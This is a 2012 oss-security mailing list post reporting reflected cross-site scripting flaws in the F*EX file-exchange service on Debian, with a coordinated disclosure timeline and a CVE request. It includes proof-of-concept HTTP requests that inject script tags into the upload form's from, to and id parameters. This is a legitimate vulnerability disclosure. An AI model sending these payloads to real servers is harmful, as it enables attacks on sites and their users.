Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 20 Feb 2012 12:14:23 +0100
From: muuratsalo experimental hack lab <muuratsalo@...il.com>
To: oss-security@...ts.openwall.com
Cc: Ulli Horlacher <framstag@....uni-stuttgart.de>
Subject: Vulnerabilitites in Debian F*EX <= 20100208 and F*EX 20111129-2.

Dear Sir/Madam,
I am Nicola Fioravanti aka muuratsalo | muuratsalo experimental hack lab.
I am writing you because I have discovered some vulnerabilities in
Debian F*EX <= 20100208 (stable) and F*EX 20111129-2. (testing and
unstable)
I have already contacted the Author who confirmed the vulnerabilities
and applied the suggested fixes.
A major update of F*EX  has been released on the 15th of February
2012. The Debian Mantainer of the package is working on it.
Together with the Author we decided not to release any public advisory
before the release of the new Debian package.

I would be grateful if you could assign CVE ids to the discovered issues.

You will find the two advisories as an attachment.

Best regards,
/NF

------------------------------------------------------------------------
F*EX <= 20100208 Cross Site Scripting Vulnerabilities
------------------------------------------------------------------------


title.............: F*EX <= 20100208 Cross Site Scripting Vulnerabilities
author............: muuratsalo 
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian 6.0.4 (squeeze) - package fex_20100208+debian1-1+squeeze1_all.deb


========================================================================

muuratsalo | muuratsalo experimental hack lab is a proud member of the Revshell.com community

========================================================================

[0x01] Software overview

F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient.

========================================================================

[0x02] Vulnerabilities overview

F*EX <= 20100208 suffers from multiple Cross Site Scripting attacks (Reflected) in the WWW upload form.

========================================================================

[0x03] Disclosure timeline

[2012-02-01] - Multiple vulnerabilities discovered and reported to the author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-XX] - Public disclosure

========================================================================

[0x04] Vulnerabilities

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [from parameter] ***

POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"


----------1922591683
Content-Disposition: form-data; name="to"


----------1922591683
Content-Disposition: form-data; name="from"

38c66<script>alert(1)</script>b08f61c45c6
----------1922591683--

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [to parameter] ***

POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"


----------1922591683
Content-Disposition: form-data; name="to"

38c66<script>alert(1)</script>b08f61c45c6

----------1922591683
Content-Disposition: form-data; name="from"

----------1922591683--

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id parameter] ***

GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1

------------------------------------------------------------------------
------------------------------------------------------------------------




------------------------------------------------------------------------
F*EX 20111129-2 Cross Site Scripting Vulnerability
------------------------------------------------------------------------


title.............: F*EX 20111129-2 Cross Site Scripting Vulnerabilities
author............: muuratsalo 
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian wheezy - package fex_20111129-2_all.deb


========================================================================

muuratsalo | muuratsalo experimental hack lab is a proud member of the Revshell.com community

========================================================================

[0x01] Software overview

F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user in opposite to the
recipient.

========================================================================

[0x02] Vulnerabilities overview

F*EX 20111129-2 suffers from a Cross Site Scripting attack (Reflected) in the WWW upload form.

========================================================================

[0x03] Disclosure timeline

[2012-02-01] - Multiple vulnerabilities discovered and reported to the author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-XX] - Public disclosure

========================================================================

[0x04] Vulnerability

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id parameter] ***

GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1

------------------------------------------------------------------------
------------------------------------------------------------------------


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ